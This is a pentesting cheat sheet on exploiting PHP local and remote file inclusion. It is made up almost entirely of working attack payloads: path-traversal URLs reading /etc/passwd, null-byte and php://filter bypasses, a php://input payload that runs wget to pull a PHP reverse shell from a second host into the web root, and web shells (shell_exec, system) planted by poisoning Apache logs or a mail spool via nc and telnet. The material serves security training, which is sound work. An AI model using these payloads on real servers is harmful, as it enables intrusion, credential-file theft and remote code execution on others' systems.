PHP - LFI and RFI
How to Exploit PHP LFI/RFI and Methods:
1) Basic Local File Inclusion and Remote File Inclusion 2) Null Byte 3) Base64 Encoded 4) PHP Input Wrapper 5) PHP Zip Wrapper 6) proc/self/environ 7) Log File Contamination 8) Email Revese Shell 9) phpinfo LFI
Basic Local File Inclusion and Remote File Inclusion
http://example.com/script.php?page=../../../../../../../../etc/passwd
http://example.com/script.php?language=/etc/passwd Null Byte
# On PHP 5.3 and below, you can use Null Byte %00 to bypass php from appending .php extensions
http://example.com/script.php?language=/etc/passwd%00
# Another way to deal with this is to use the ? (question mark) in order to make the rest of the strings to be interpreted as a parameter.
# Also try %2500
http://example.com/script.php?language=/etc/passwd? Base64 Encoded
index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
index.php?page=php://filter/convert.base64-encode/resource=index.phpPHP Input Wrapper - POST
Example 1:
http://192.168.183.128/fileincl/example1.php?page=php://input
# POST Data would be something like this:
<? system('wget http://192.168.183.129/php-reverse-shell.php -O /var/www/shell.php');?>
# After uploading execute the reverse shell at:
http://192.168.183.129/shell.phpExample 2:
PHP Zip Wrapper
The zip wrapper processes uploaded .zip files server side allowing a penetration tester to upload a zip file using a vulnerable file upload function and leverage he zip filter via an LFI to execute. A typical attack example would look like:
1. Create a PHP reverse shell 2. Compress to a .zip file 3. Upload the compressed shell payload to the server 4. Use the zip wrapper to extract the payload using:
php?page=zip://path/to/file.zip%23shell5. The above will extract the zip file to shell, if the server does not append .php rename it to shell.php instead
proc/self/environ
/proc/self/environ
# If the above works and we have access to the file... then you can do this via the User Agent:
User Agent: <?php echo "Hello"; ?> 
Log File Contamination
nc -nv 10.10.10.35 80
<?php echo shell_exec($_GET['cmd']);?>
# To execute it:
http://10.10.10.7/vuln.php?page=../../../../../../../../../var/log/apache2/access.log%00&cmd=ipconfig Email Revese Shell
telnet 10.10.10.7 25
EHLO ippsec.beep.htb
VRFY asterisk@localhost
### if successful, then:
mail from:pwned@haha.io
rcpt to: asterisk@localhost
data
Subject: You have been pwned
<? echo system($_REQUEST['ipp']); ?>
.
# Don't forget the . (dot) above
# Then:
http://10.10.10.7/vuln.php?page=../../../../../../../../../var/mail/asterisk%00&ipp=whoami phpinfo() LFI
1 - Check if upload is enabled
GET /phpinfo.php HTTP/1.12 - Execute the POST with Content Type and check for PHP variables. Below are two examples.
Example 1 from the documentation:
Example 2 from IPPSEC - POISON
2 - The script is located at PayLoadAllTheThings - PHP LFI Path.
# Must change:
- PAYLOAD
- URI
- [tmp_name] => TO [tmp_name] =>3 - Start the listener and get it done
References: https://secf00tprint.github.io/blog/payload-tester/lfirfi/en https://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability/ https://highon.coffee/blog/lfi-cheat-sheet/ https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/
Last updated